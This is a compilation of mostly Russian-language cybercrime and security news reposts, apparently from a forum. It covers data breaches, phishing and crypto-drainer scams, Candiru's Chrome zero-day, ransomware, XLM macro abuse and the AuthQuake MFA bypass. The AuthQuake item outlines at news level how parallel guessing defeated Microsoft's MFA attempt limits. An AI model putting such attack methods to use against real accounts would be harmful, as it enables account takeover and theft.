Последовавший за этим конфликт отражен в ряде внутренних документов, полученных в соответствии с законами о свободе информации. В них видно, как Европол тянет время, а наблюдательный орган сообщает им, что им не удалось устранить «правонарушение». Полицейское агентство, похоже, настаивает на новом законодательстве ЕС, чтобы обеспечить ретроспективное прикрытие того, что оно делало без правовых оснований в течение шести лет.
Нервозности Европейской комиссии по поводу публичного столкновения было достаточно, чтобы привлечь Моник Париа, генерального директора ЕС по внутренним делам, на встречу между двумя агентствами в декабре 2021 года.
Но глава EDPS Войцех Веверовски сказал в интервью Guardian, что встреча была «последним моментом для Европола, чтобы добавить некоторую информацию, которая не была добавлена в их последних ответах на наше письмо».
Поскольку встреча не дала результатов в отношении опасений по поводу законности хранения данных, «для нас не было другого способа решить проблему, — сказал он, — кроме как принять решение об удалении данных, срок действия которого превышает шесть месяцев».
Ниови Вавула, эксперт по правовым вопросам Лондонского университета королевы Марии, сказал: «Новый закон на самом деле является попыткой обмануть систему. Европол и комиссия в течение многих лет пытались постфактум исправить незаконное хранение данных. Но введение новых правил не решает законным образом ранее незаконное поведение. Это не то, как работает верховенство права».
Опасения экспертов не ограничиваются нарушением Европолом правил хранения данных. Они также видят правоохранительный орган, который стремится проводить массовые операции по слежке за личностью.
Члены комитета по гражданским свободам, правосудию и внутренним делам Европейского парламента во время слушаний в июне 2021 года сравнили агентство с АНБ. Веверовски удивил присутствующих, поддержав сравнение с практикой Европола по хранению данных. Он указал, что Европол использует те же аргументы, что и АНБ для защиты операций по сбору больших объемов данных и массовой слежки, как показал Сноуден.
«АНБ сказало европейцам после того, как начался скандал с Prism, что они не обрабатывают данные, они просто собирают их и будут обрабатывать только в том случае, если это необходимо для расследования, которое они проводят», — сказал Веверовски членам Европарламента. «Это то, что не соответствует европейскому подходу к обработке персональных данных».
Эрик Топфер, эксперт по наблюдению из Немецкого института прав человека, изучил предлагаемые новые правила Европола и сказал, что они предполагают, что агентство будет получать данные непосредственно из банков, авиакомпаний, частных компаний и по электронной почте. «Если Европолу нужно будет запрашивать только определенные виды информации, чтобы они были поданы на блюдечке с голубой каемочкой, то мы приближаемся к созданию агентства, подобного АНБ со сверхполномочиями».
Борьба с EDPS из-за хранения данных является последним свидетельством того, что Европол отдает предпочтение технологическим решениям проблем безопасности, а не правам на неприкосновенность частной жизни. Босс Европола, ранее глава полиции Бельгии, в июле 2021 года утверждал, что потребности правоохранительных органов для извлечения данных из смартфонов оправдываются соображениями общей безопасности и не угоржают нарушению конфиденциальности. В его статье аргументируется законное право на ключи ко всем службам шифрования.
Не было упоминания о разоблачениях шпионского ПО Pegasus, которые показали, что многие правительства, в том числе некоторые в Европе, активно пытались перехватить сообщения правозащитников, журналистов и юристов, для которых шифрование является единственной защитой.
В 2020 году Европол раструбил о своей причастности вместе с французской и голландской полицией к взлому зашифрованного телефонного сервиса EncroChat, в результате чего поток личных данных попал в архив. Когда секретная операция была раскрыта Европолом и его коллегами из Евроюста, она была воспринята как один из самых больших успехов в борьбе с организованной преступностью в истории Европы. Только в Великобритании к августу 2021 года было взято под стражу около 2600 человек, и Никки Холланд, директор по расследованиям Национального агентства по борьбе с преступностью Великобритании, сравнила взлом с «наличием крота в каждой высшей организованной преступной группировке в стране».
Европол скопировал данные, извлеченные из 120 миллионов сообщений EncroChat и десятков миллионов записей звонков, изображений и заметок, а затем передал их национальной полиции. Поток доказательств незаконного оборота наркотиков и других преступлений заглушил опасения по поводу последствий операции. Хакерская операция, которая превратила телефоны EncroChat в мобильных шпионов, действующих против их пользователей, имеет важные сходства с вредоносными программами для шпионажа, такими как Pegasus.
Юристы из Германии, Франции, Швеции, Ирландии, Великобритании, Норвегии и Нидерландов, представляющие интересы клиентов, оказавшихся под стражей в результате последствий слежки, встретились в Утрехте в ноябре 2021 года. «Следователи и прокуроры скрывали или искажали факты», — заявил немецкий адвокат Кристиан Лёдден. «Мы все согласны с тем, что это не самые лучшие люди в мире, но чем мы готовы пожертвовать, чтобы осудить еще одного человека?»
Среди клиентов EncroChat были не только преступники, но и законопослушные граждане: юристы, журналисты и бизнесмены. Голландский адвокат Харун Раза был одним из них и сказал, что купил телефонную трубку EncroChat в магазине Роттердама. Он потребовал, чтобы его данные были стерты. «Насколько я понял, копия до сих пор лежит в базах данных Европола, где она может остаться навсегда».
Французский адвокат Робен Бинсар убежден, что вся операция равносильна массовой слежке. Он сказал: «Демонтаж всей системы связи похож на то, как полиция обыскивает все квартиры в доме, чтобы найти доказательства преступления: это нарушает неприкосновенность частной жизни и просто незаконно».
С 2016 года Европол также проводит программу массовой проверки в лагерях беженцев в Италии и Греции, собирая данные о десятках тысяч просителей убежища в поисках предполагаемых иностранных боевиков и террористов. Согласно частично рассекреченному отчету об инспекции EDPS, полученному в соответствии с законами о свободе информации, «плановые проверки» Европолом мигрантов, пересекающих границы ЕС, «не разрешены», поскольку для такой программы «нет законных оснований». Проверка могла привести к тому, что личные данные мигрантов были сохранены в криминальной базе данных, независимо от того, были ли обнаружены какие-либо связи с преступностью или терроризмом. Европол отказался раскрыть какие-либо оперативные подробности.
Внутренние документы ясно показывают, что к весне 2020 года Европол разрабатывал собственную программу машинного обучения и искусственного интеллекта, в то время как надзорный орган ЕС наступал ему на пятки. Оказавшись с растущим кешем данных, агентство обратилось к алгоритмам, чтобы разобраться во всем этом. Через месяц после того, как инспектор по обработке данных публично уведомил Европол, агентство вернулось с вопросом: если оно хочет обучать алгоритмы на данных, о сохранении которых оно уже получило предупреждение, может ли оно начать процесс оценки воздействия на защиту данных для этого без надзора со стороны EDPS?
В запросе четко указано, что алгоритмы, включающие средства распознавания лиц, не будут разрабатываться и использоваться для получения конфиденциальных данных, таких как состояние здоровья, этническая принадлежность, сексуальная или политическая ориентация, хотя, как признал Европол, такие данные неизбежно будут обрабатывается с помощью инструментов: «Мы признаем, что полученные результаты будут содержать конфиденциальные данные, и их обработка будет соответствовать Регламенту Европола».
Когда регулятор не дал зеленый свет, Европол фактически решил отстранить EDPS и продолжить работу, несмотря ни на что, подтвердив это в письме от января 2021 года.
В ответ наблюдательный орган заявил, что откроет официальную процедуру мониторинга. К концу февраля 2021 года Европол приостановил свою программу машинного обучения. Европол сообщил журналистам Guardian, что на сегодняшний день он «не использовал собственные модели машинного обучения для оперативного анализа, а также не проводил «обучение» на архиве персональных данных».
Но есть явные признаки того, что скоро тормоза отпустят. Европол уже начал набор экспертов для помощи в разработке ИИ и интеллектуального анализа данных.
Возникающая форма Европола вызывает тревогу у некоторых депутатов Европарламента, таких как Саския Брикмонт из Бельгии. «Во имя борьбы с преступностью и терроризмом у нас есть эволюция агентства, которое выполняет очень важные миссии, но они не выполняются должным образом. Это приведет к проблемам», — сказала она.
Хлоя Бертелеми, эксперт Европейской сети НПО по цифровым правам, сказала, что, хотя Европол отстает от США с точки зрения технологических возможностей, он идет по тому же пути, что и АНБ.
«Возможность Европола собирать огромные объемы данных и накапливать их в том, что можно было бы назвать ковчегом больших данных, после чего почти невозможно узнать, для чего они используются, превращает его в черную дыру».
• Source: [https://www.theguardian.com/world/2...ordered-to-delete-vast-store- of-personal-data](https://www.theguardian.com/world/2022/jan/10/a-data-black- hole-europol-ordered-to-delete-vast-store-of-personal-data)
The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.
USAGM is a US government agency whose mission is to "inform, engage, and connect people around the world in support of freedom and democracy." USAGM operates broadcast networks, such as Voice of America, Radio Free Europe, Office of Cuba Broadcasting, Radio Free Asia, and Middle East Broadcasting Networks, to deliver news and information to people worldwide.
In a data breach notification shared with BleepingComputer by former Voice of
America White House correspondent
Dan Robinson, USAGM discloses
that they suffered a data breach after falling for a phishing attack in
December 2020.
This phishing attack allowed a threat actor to access an agency email account containing the personal information of current and former USAGM, Voice of America, and Office of Cuba Broadcasting employees who worked at the agency between 2013 and 2020.
The exposed information includes full names and Social Security numbers of employees and possibly their beneficiaries and dependents.
Data breach
notification sent by USAGM
USAGM states that they secured the affected account once they learned of the
breach and began providing phishing education to staff members. They also sped
up their rollout of multifactor authentication (MFA) for the agency's Office
365, SharePoint, and OneDrive accounts.
While USAGM is offering a free one-year subscription to Experian IdentityWorks, this may have come too late.
Robinson told BleepingComputer that he learned that the letters were sent to current employees on April 13th, 2021, four months after the bad actor accessed the data.
This long delay could have given the threat actor time to perform further phishing attacks or identity theft on those exposed in the data breach.
Affected people should watch out for potential phishing scams utilizing the stolen data and warn their family members to be on the lookout as well.
В отдел полиции № 3 «Центральный» УМВД России по г. Симферополю поступили заявления от 56 и 66-летней местных жительниц, которые обнаружили списание денежных средств с их банковских карт за покупки в интернет-магазине, которые они не совершали. Общая сумма ущерба составила более 200 тысяч рублей.
В рамках ОРМ сотрудниками Управления уголовного розыска МВД по Республике Крым совместно с коллегами из УМВД России по г. Симферополю установлен и задержан 21-летний житель Республики Башкортостан.
Следственным отделом ОП № 3 «Центральный» Управления МВД России по г. Симферополю возбуждены уголовные дела по признакам состава преступления, предусмотренного ч. 3 ст. 158 УК РФ (Кража). Молодому человеку грозит максимальное наказание в виде лишения свободы сроком до 6 лет.
В настоящее время подозреваемому избрана мера пресечения в виде заключения под стражу.
Сотрудниками полиции проводятся мероприятия по установлению причастности задержанного к совершению аналогичных преступлений на территории Республики Крым.
В прокуратуре Крыма уточнили: не такой уж он и «хакер»… Но без хакера не обошлось.
Молодой человек, желая получить незаконный доход, договорился с неустановленным лицом, данные которого устанавливаются следственным путем, о хищении денежных средств. Для этого соучастник, используя данные карт, в том числе номер, срок действия и CVC-код, предоставленные подельником, осуществил оплату денежными средствами с банковских карт двух жительниц региона за покупки на одной из популярных электронных платформ доставки товаров. Заказы были оформлены обвиняемым и товары были доставленыпо указанному им адресу в город Уфа, — сообщили в прокуратуре.Click to expand...
Исследователи обнаружили в социальной сети X (бывший Twitter) несколько фальшивых аккаунтов, операторы которых выдают себя за специалистов по расследованию криптовалютных афер и представителей компаний, занимающихся безопасностью блокчейна.
Для привлечения потенциальных жертв мошенники публикуют сообщения о взломе крупных криптовалютных платформ, призывая пользователей действовать оперативно, чтобы обезопасить свои цифровые активы от возможной кражи. Для этого якобы срочно нужно перейти по ссылке на вредоносный сайт (по адресу revoketokens[.]io или revokea[.]sh) и отозвать разрешение, подключив свой кошелек к этому ресурсу. Как только это происходит, злоумышленники похищают средства пользователя.
[](https://xakep.ru/wp-
content/uploads/2023/11/441995/phishing-page.jpg)Вредоносный сайт
В частности, мошенники выдают
себя за таких
специалистов и компании как CertiK, ZachXBT и Scam Sniffer, и используют
сообщения о фальшивых взломах Uniswap и Opensea.
Чтобы имитировать легитимные учетные записи настоящих специалистов, хакеры создают новые аккаунты с похожими именами. Например, известный блокчейн- аналитик ZachXBT имеет учетную запись @zachxbt, а мошенники создали учетную запись @zacheryxbt.
[](https://xakep.ru/wp-
content/uploads/2023/11/441995/fakeZachXBT_ScamSniffer-tweets.jpg)Фальшивые
сообщения о взломах
Издание Bleeping Computer сообщает, что многие пользователи X попались на эту
уловку (у некоторых из них насчитываются сотни тысяч подписчиков) и широко
распространили информацию о мошенниках и фальшивых взломах.
В качестве примера можно привести сообщение исследователей VX-Underground, которые ошибочно предположили, что информация о взломе платформы Opensea поступила от надежного аккаунта. В более позднем сообщении VX-Underground объяснили, как они попались на уловку скамеров.
[](https://xakep.ru/wp- content/uploads/2023/11/441995/tweet.jpg)
Примечателен и масштаб кампании: бот-аккаунты продвигали хэштеги типа #UniswapExploit настолько активно, что в итоге попали в топ трендовых тем в США.
Исследователь ZachXBT, чей аккаунт имитировали мошенники, рассказал журналистам, что впервые он заметил эту тактику злоумышленников 9 ноября. Именно тогда Хейден Адамс (Hayden Adams), основатель децентрализованной биржи Uniswap, предупредил криптовалютное сообщество о мошенничестве, уточнив, что в природе не существует никаких эксплоитов для Uniswap, а сообщения об этом исходят от фальшивых аккаунтов X, выдающих себя за ZachXBT, Certik и других известных в криптовалютном сообществе личностей.
По данным настоящего ZachXBT, таким способом злоумышленники уже похитили более 305 000 долларов в криптовалюте. Активы, украденные у жертв этих атак, хранятся по адресам 0x85a5b2968fae4e7f60f14e3bfc2ebda67050740f и 0xe91fa37c3c5cf801cc8c6cd25a4d2399b3fba4e8.
Компания Operation Zero, скупающая эксплойты для уязвимостей нулевого дня, предлагает исследователям 20 миллионов долларов за разработку инструментов для взлома Android-устройств и iPhone.
Столь щедрое предложение Operation Zero опубликовала у себя в Telegram, а также в официальном аккаунте X. Интересно, что сумму вознаграждения подняли сразу в сто раз — с $200 000 до $20 000 000.
«За счёт увеличения суммы вознаграждения и дополнительных бонусов мы мотивируем разработчиков работать с нашей платформой», — пишет компания.
Зарубежные специалисты считают, что Operation Zero работает на территории России, а началом её деятельности можно считать 2021 год. На официальном сайте компании указано, что она оказывает услуги исключительно частным и государственным клиентам из России.
Когда гендиректора Сергея Зеленюка спросили, почему организация не работает со странами НАТО, он ответил: «никаких других причин, кроме совершенно очевидных».
Зеленюк также уточнил, что нынешние суммы за эксплойты — временные, фактически они отражают спрос на взлом устройств на Android и iPhone. Условно завтра они могут стать меньше.
Из недавних громких взломов мобильных девайсов можно вспомнить целевые атаки на iOS-устройства, затронувшие сотрудников Kaspersky. Тогда киберкампания получила имя «Операция Триангуляция» (Operation Triangulation).
14 августа 2023 года на одном из теневых форумов была выставлена на продажу база данных зарегистрированных пользователей, а также доступ к серверу Discord.io — стороннему интерфейсу для серверов кроссплатформенной проприетарной системы Discord.
Сервис Discord.io подтвердил , что её сетевая IT-инфраструктура подверглась взлому, в результате чего утекли данные 760 тысяч пользователей. Сайт временно приостановил предоставление своих услуг и проводит расследование инцидента.
На сайте проекта появилось сообщение о ситуации: «В Discord.io произошла утечка данных. Мы временно останавливаем все операции». Также сервис начал отменять все платные подписки.
Хакер, использующий ник Akhirah, получил доступ к следующим данным пользователей: имя (username), адрес электронной почты, домашний адрес (небольшое количество пользователей), хешированный пароль (с помощью bcrypt) и Discord ID.
Akhirah предупредил, что база данных пользователей Discord.io пока не передана третьим лицам, но может быть продана, если сервис не выполнит определенные требования, включая удаление запрещенной информации и ссылок на незаконный контент.
Об инциденте также сообщили эксперты сервиса разведки утечек данных и мониторинга даркнета DLBI. «Судя по предоставленному тестовому образцу, логины (адреса электронной почты) действительные и проходят проверку через восстановление пароля на сайте discord.com/login », уточнили эксперты канала «Утечки информации».
Ряды борцов с поставщиками коммерческого шпионского ПО пополняются.
Вслед за Microsoft, Google и Citizen Lab очередное разоблачение подкатили ресерчеры Avast, которые обнаружили, что израильский поставщик шпионского ПО Candiru использовал уязвимость 0-day в Google Chrome для шпионажа за журналистами и другими лицами на Ближнем Востоке с помощью ПО DevilsTongue.
После наезда Citizen Lab разработчик софта прекратил все операции DevilsTongue и ушел в тень, как оказалось для переоснащения своего арсенала.
На вооружение взяли CVE-2022-2294, которая представляет собой серьезное переполнение буфера динамической памяти в WebRTC и в случае успешного использования может привести к RCE на целевом устройстве.
Патч для баги, как мы сообщали ранее, был выпущен Google 4 июля, однако подробности эксплуатации 0-day тогда не раскрывались. Теперь они представлены в отчете Avast.
Candiru начала применять уязвимость в марте 2022 года, нацеливаясь на цели в Ливане, Турции, Йемене и Палестине.
Операторы шпионского ПО использовали распространенную тактику атаки на водопой, компрометируя целевые или создавая новые веб-сайты, на которые впоследствии с браузеров на основе Chromium обращались жертвы, как правило, после целевого фишинга или использования других методов.
В одном случае злоумышленники подломили веб-сайт информационного агентства в Ливане и внедрили фрагменты JavaScript, которые позволили проводить атаки XXS и перенаправляли действительные цели на сервер с эксплойтом.
После чего жертвы профилировались, а целевые устройства взламывались. Злоумышленники собирали информацию в отношении языка, часового пояса, экрана, типа устройства, плагинов браузера, памяти устройства, функциональности файлов cookie и др.
В случае с Ливаном эксплуатация 0-day позволила актору выполнить шелл-код внутри процесса рендеринга и реализовать другую уязвимостью выхода из песочницы, которую Avast не смогли воспроизвести. Вместе с тем, обнаруженный эксплойт работал только в среде Windows.
После первоначального заражения DevilsTongue использовал BYOVD, чтобы повысить привилегии и получить доступ для чтения и записи к памяти скомпрометированного устройства.
Avast установили, что BYOVD, используемый Candiru, также являлся 0-day, который невозможно исправить даже с обновлением.
Ресерчеры Avast не смогли точно идентифицировать конечную стратегическую цель обнаруженной кампании, полагая, что атаки были реализованы для наблюдения за отдельными персоналиями, данные которых также пока не разглашаются.
Но будем посмотреть: похоже, что у этой истории точно будет продолжение.
• Source: <https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero- days-in-the-middle-east/>
Полицейский продавал справки от ТЦК через даркнет. В августе 23 года он открыл
магазин на анонимной площадке в сети даркнет и продавал справки
ТЦК для пересечения границы Украины.
Цена справки 9000 долларов.
При покупке партии справок на сумму 80 000 долларов полицейский решил отвезти
их сам
Тем самым попал в руки СБУ при приеме передачи денег.
Полиция Индонезии арестовала молодого эстонца, которого подозревают в краже данных клиентов из банковского автомата с помощью скиммера. Если его признают виновным, ему может грозить до 20 лет лишения свободы и крупный штраф.
Представитель полиции Джакарты Эндра Зулпан сказал на пресс-конференции, что прокурор предъявил 24-летнему Сергею Пучкову обвинение по четырем статьям, пишет Postimees.
Помимо длительного тюремного заключения, молодому уроженцу Эстонии может грозить штраф в размере до 10 миллиардов рупий (более 65 000 евро).
По данным индонезийской полиции, у Сергея Пучкова было как минимум двое сообщников, объявленных в международный розыск.
Мошенники прислали жителю Эстонии SMS-сообщение с информацией о блокировке счета. Он перешел по ссылке, ввел пароли и лишился внушительной суммы.
11 июля полиция начала производство по факту мошенничества. Накануне, 10 июля, мужчина получил на мобильный телефон SMS-сообщение якобы из банка, в котором было написано, что его счет блокируется.
Пострадавший перешел по предлагаемой ссылке и залогинился. Позже он обнаружил, что с его банковского счета на неизвестный счет были переведены 2558 евро.
Вернуть потерянные деньги было уже невозможно.
Полиция возбудила 13 июля уголовное дело по статье "мошенничество" после обращения жителя Пярнумаа, который летом 2021 года поверил уговорам мошенников начать зарабатывать на инвестициях.
Летом прошлого года 43-летнему мужчине позвонили неизвестные лица и уговорили его инвестировать. Сначала мужчина вложил деньги в криптовалюту. Затем мошенники заставили мужчину поверить, что инвестиции растут, и предложили ему инвестировать дополнительные средства.
По предварительным данным, мужчина инвестировал более 20 000 евро.
Когда он захотел получить свои деньги, ему их не вернули.
source: postimees.ee/7562846/eesti-kodanikku-ahvardab-indoneesias- andmevarguse-eest-20-aastane-vangistus
Платформа Animoca Brands Lympo NFT сообщила о взломе своего горячего кошелька, в результате которого хакеры вывели 165.2 млн LMT, а также разместила адреса скомпрометированных кошельков пользователей.
Согласно [заявлению](https://medium.com/lympo-official/lympo-statement-to-the- community-914d6b453b1f) Lympo на Medium, злоумышленникам удалось вывести 165.2 млн токенов LMT общей стоимостью $18.7 млн. Во время взлома были скомпрометированы следующие кошельки:
0x5D32b87A43a2bd1f7df209d2F475b165d2c09E24
0x526232F70b97938E19394e57BC5eE1d5d929074e
0xB0a60eBA24f6CF18CFDED0672c5C7a7529DcC342
0x934dd62782BFe4a8E3f096E014266e5F5adc1b2a
0x877eECC3Ae4Bb28f048c16CD65A44cDE025345a1
0x36d97147cF8E1B75254748Cf0A102316fCc61697
0xA432C0081307733e801Ea7877e725F4E0adfbBfF
0x4b936321b0E3E2d919412502B6aDA09E9b7d484b
0x75912Da145cA00092AF317F8c3A84073A5665256
0x4C801611cdaB559861d4dB24155927F903DEa02A
Lympo сообщила, что ввела меры предосторожности, чтобы предупредить кражу оставшихся токенов и защитить своих пользователей. Платформа предупредила, что временно удаляет LMT из различных пулов ликвидности, чтобы свести к минимуму колебание цены токена после взлома.
«Обратите внимание, что большая часть резерва LMT находится в хранилище холодного кошелька и оставалась в безопасности на протяжении всего инцидента», – говорится в заявлении.
Lympo продолжает расследование кибератаки и готовит план по устранению ее последствий. Команда платформы заверила держателей LMT, что приложит все усилия для скорейшего возобновления нормальной работы. При этом оператор Lympo не разместил информации о том, что обратился в правоохранительные органы или в агентство по кибербезопасности в связи с инцидентом.
Предположительно, большую часть украденных активов хакеры обменяли на Ethereum на площадках Uniswap и SushiSwap.
Цена LMT после взлома обвалилась с уровня около $0,11 до $0,01 — приблизительно на 90%.
Производитель автозапчастей отправил часть сотрудников в Германии и Румынии в оплачиваемый отпуск.
Немецкий производитель компонентов для автомобилей Eberspächer Group подвергся вымогательской атаке, повлекшей сбой в работе IT-систем компании. В результате концерн был вынужден отправить часть работников в оплачиваемый отпуск.
Eberspächer Group специализируется на разработке и производстве систем отопления и кондиционирования воздуха для автотранспорта. В настоящее время концерн имеет 70 представительств в 28 странах.
В сообщении на сайте компания признала , что стала жертвой организованной кибератаки, затронувшей IT-системы, и привлекла специалистов в области безопасности для устранения угрозы.
Из-за инцидента, имевшего место 24 октября, Eberspächer отключила официальные web-сайты, системы электронной почты и производственные системы. В связи с невозможностью координировать производственный процесс и обрабатывать заказы компания отправила часть сотрудников в Германии и Румынии в оплачиваемый отпуск.
Представители компании не предоставили подробности о кибератаке, однако, по данным немецкого издания Automobilwoche, инцидент расследуется как случай «компьютерного саботажа и шантажа».
В 2019 году бельгийский производитель запчастей для авиационной техники ASCO оказался в похожей ситуации – компания была вынуждена приостановить работу четырех заводов из-за вымогательской атаки и оправить большинство сотрудников в оплачиваемый отпуск.
Подробнее: https://www.securitylab.ru/news/526042.php
В конце года специалисты Microsoft [отключат](https://therecord.media/microsoft-to-disable-excel-4-0-macros-one- of-the-most-abused-office-features/) возможность запуска макросов XLM в Office 365 по умолчанию. Этот тип макросов также известен как Excel 4.0 Macros, так как впервые был внедрен в этой версии редактора электронных таблиц еще в 1992 году. С тех пор макросы регулярно использовались для кибератак, а в прошлом году частота использования такого вредоносного ПО серьезно повысилась.
Microsoft plans to disable a legacy feature known as Excel 4.0 macros, also
XLM macros, for all Microsoft 365 users by the end of the year, according to
an email the company has sent customers this week, also seen by The Record.
Introduced in 1992 with the release of the Excel 4.0 software — from where the
feature also gets its name — XLM macros allow users to enter complex formulas
inside Excel cells that can execute commands, either inside Excel or the local
filesystem. While XLM macros were replaced with the release of Excel 5.0,
which introduced VBA-based macros, support for this feature has remained
inside the Office Excel software to this day.
Excel 4.0 macros have been widely abused over the past two years As with most
Office tools that allow basic scripting-like actions, the feature has been
abused over the course of the past decades by both financially motivated
groups and state-sponsored threat actors alike. But the abuse has never been
as rampant as it has been since early 2020 when several security researchers
noted the sudden and unexplainable increased attention XLM macros had been
getting from numerous top-tier threat actors. Reports from
[VMWare](https://blogs.vmware.com/networkvirtualization/2020/10/evolution-of-
excel-4-0-macro-weaponization-continued.html/),
ReversingLabs,
[Lastline](https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-
weaponization/),
[MadLabs](https://madlabs.dsu.edu/madrid/blog/2021/05/17/analyzing-document-
with-malicious-excel-4-0-macros/),
Expel,
[DeepInstinct](https://www.deepinstinct.com/2021/08/12/black-hat-2021-def-
con-29-new-research-on-excel-4-0-macros/), and many
[others](https://www.sneakymonkey.net/2020/06/22/excel-4-0-macros-so-hot-
right-now/) referenced a spike in malware strains and threat actors abusing
XLM macros, used in anything from cyber-espionage to banking trojans, and from
ransomware to cryptocurrency theft.
подрыв того или иного устройства не наша тема , но эту тему не мог пройти мимо, в армию сходите чтоль , дебилы.
Несчастный случай позволил Европолу выявить банду грабителей, которая взрывала банкоматы в Германии и Нидерландах. Во время очередной записи обучающего урока произошёл взрыв. 29-летний мужчина погиб, а его 24-летний сообщник получил серьезные ранения и был арестован.
«Главный подозреваемый, 29-летний мужчина, подорвался при записи видеоинструкции. Его 24-летний сообщник был серьезно ранен», — рассказала журналистам представитель Европола, добавив, что выжившего преступника арестовали.
По данным Европола, полицейские вышли на банду в феврале 2020 года после того, как к ним обратились власти немецкого Оснабрюка, сообщив о подозрительных закупках банкоматов. Как оказалось, их приобрели преступники для своего учебного центра. Мужчины записывали видеоуроки, в которых показывали, как эффективно взорвать банкомат той или иной модели.
В Европоле заявили, что в результате следственных действий, полиция Нидерландов и Германии арестовала в общей сложности девять человек. Банда причастна минимум к 15 взрывам банкоматов в Германии.
Платформа Boystown была активна как минимум с июня 2019 года и насчитывала более 400 тыс. подписчиков.
В результате масштабного расследования сотрудникам правоохранительных органов Германии удалось отключить одну из крупнейших в даркнете online-платформ с детской порнографией. Платформа Boystown была активна как минимум с июня 2019 года и насчитывала более 400 тыс. подписчиков.
В ходе правоохранительной операции были задержаны четыре гражданина Германии (один мужчина был задержан в Парагвае) в возрасте 40-64 года. Трое из них предположительно выполняли функции администраторов Boystown, а четвертый подозревается в том, что он является платным подписчиком платформы и одним из самых активных ее пользователей с более чем 3,5 тыс. публикаций.
Возглавляемое немецкими правоохранительными органами расследование длилось несколько месяцев. В нем принимал участие Европол, а также правоохранительные органы Нидерландов, Швеции, Австралии, США и Канады.
Boystown предоставляла своим подписчикам место для публикации порнографических материалов с участием несовершеннолетних, в том числе «серьезнейшего сексуального насилия над маленькими детьми». На платформе также было предусмотрено несколько каналов для общения пользователей, а администрация инструктировала подписчиков, как получать доступ к сайту самым безопасным путем, заметать свои следы и избегать уголовного преследования.
Эксперты компании Confiant сообщают, что начиная с прошлого года вредоносная реклама злоупотребляла уязвимостью нулевого дня в браузерах на базе WebKit (CVE-2021-1801), и хотя патчи были выпущены в начале февраля, атаки по- прежнему продолжаются. Из-за этой уязвимости пользователи попадали с проверенных ресурсов на мошеннические сайты.
По данными исследователей, за атаками стоит хак-группа под названием ScamClub, активная с 2018 года. Как ранее уже рассказывали специалисты, в целом тактика группировки проста: обычно злоумышленники скупают большое количество рекламных мест на нескольких платформах, надеясь, что хотя бы некоторые из вредоносных объявлений в итоге пройдут проверки безопасности. Даже если большая часть рекламы будет заблокирована, попавших в публикацию объявлений в итоге будет достаточно для полномасштабной кампании.
Как правило, группировка нацелена на пользователей iOS и с помощью вредоносной рекламы перенаправляет их на мошеннические сайты, где у жертв пытаются выманить финансовую информацию. Обычно пользователям сообщали, что они выиграли подарочную карту от известного бренда.

Новая операция ScamClub, стартовавшая еще прошлым летом, стоится по тому же принципу, но на этот раз хакеры использовали уязвимость, которая позволяла вредоносному коду совершить побег из песочницы HTML-элемента iframe. Корень проблемы заключался в том, как Webkit работает с JavaScript слушателями событий (event listeners). Так как баг крылся в коде WebKit, уязвимости были подвержены Apple Safari и Google Chrome для iOS.
«Только за последние 90 дней ScamClub показали свою вредоносную рекламу более 50 000 000 раз. Причем это базовый уровень активности, которой дополняется частыми всплесками — за один день количество показов объявлений может превышать 16 000 000», — пишут эксперты.
Click to expand...
Хотя исследователи уведомили Apple и Google о проблеме еще летом прошлого года, патч был выпущен лишь в декабре, и исправление достигло Safari для macOS и iOS только в этом месяце.
Специалисты Confiant опубликовали список доменов, где группа ScamClub размещала свои мошеннические сайты с фейковыми подарочными картами, их адреса можно увидеть на иллюстрации ниже.

Источник: xakep.ru/2021/02/17/webkit-0day/
Компания Oasis Security [раскрыла детали](https://www.oasis.security/resources/blog/oasis-security-research- team-discovers-microsoft-azure-mfa-bypass) атаки, которая позволяла обойти многофакторную аутентификацию (МФА) Microsoft. Атака получила название AuthQuake, и связанная с ней уязвимость была обнаружена еще в конце июня текущего года.
Согласно данным экспертов, уязвимость была признана критической и позволяла злоумышленникам обходить МФА Microsoft, получать доступ к учетным записям (при условии, что атакующие уже знали имя пользователя и пароль).
Обход МФА мог применяться для получения доступа к электронной почте Outlook, файлам OneDrive, чатам Teams и облачным инстансам Azure. При этом AuthQuake опасна тем, что на ее выполнение уходит (в среднем) всего один час, она не требует никакого взаимодействия с пользователем и во время атаки жертва не получает никаких предупреждений.
Суть проблемы заключалась в том, что при использовании приложения- аутентификатора для получения шестизначного кода для МФА, одна сессия позволяет выполнить до 10 неудачных попыток ввода, что должно предотвратить брутфорс-атаки. Однако исследователи обнаружили, что злоумышленник может выполнять несколько попыток ввода одновременно, что позволяет ему очень быстро перебирать возможные комбинации.
Во время проведенных тестов выяснилось, что каждый МФА-код, сгенерированный приложением, действителен в течение примерно трех минут. Это означает, что у злоумышленника есть примерно трехпроцентный шанс угадать правильную комбинацию. А по истечении трех минут атакующий может инициировать новую сессию, и повторять этот процесс до тех пор, пока не подберет правильный код.
Тесты показали, что вероятность угадать код после 24 сессий (которые заняли около 70 минут) превышала 50%, а в некоторых случаях код удавалось подобрать намного быстрее, как показано в этом видео, демонстрирующем эксплоит в действии.
[](https://xakep.ru/wp- content/uploads/2024/12/492975/675065c871bd7251153970ae_AD_4nXd343u0I_tqk0DNG60D3OqQow8PArvr8VqXKbJbH4rMSf9W27tco9Puj8-dH3_Sy- OHGQ_EnFFnBnAts_9zHWuKgPeVfpvKnkbiMklwhrJLayCc5M0AYN9k9yEb79HjqTwKrrscIw8f5hJVzP_lzk4.gif)
В настоящее время уязвимость уже устранена. Так, инженеры Microsoft выпустили временную «заплатку» еще в конце июня, когда только узнали о проблеме, а в октябре для AuthQuake вышел полноценный патч.
Исследователи Oasis Security пишут, что не имеют права раскрывать детали исправления, но могут подтвердить, что «Microsoft ввела гораздо более строгие ограничения, которые срабатывают после нескольких неудачных попыток, и эти строгие ограничения потом длятся примерно полдня».
Полный отчет PDF [здесь](https://pages.oasis.security/rs/106-PZV-596/images/oasis-security- authquake-mfa-bypass.pdf?version=0).
Кэш Патель, назначенный Дональдом Трампом кандидатом на пост директора ФБР, стал мишенью хакеров, предположительно, из Ирана. По данным источников, хакеры смогли получить доступ к некоторым из его коммуникаций. Представитель Трампа, Алекс Пфейффер, отказался комментировать инцидент, но подчеркнул, что Патель был ключевым фигурой в борьбе с иранским режимом во время первого президентского срока Трампа и продолжит усилия по защите Америки в случае назначения на пост главы ФБР.
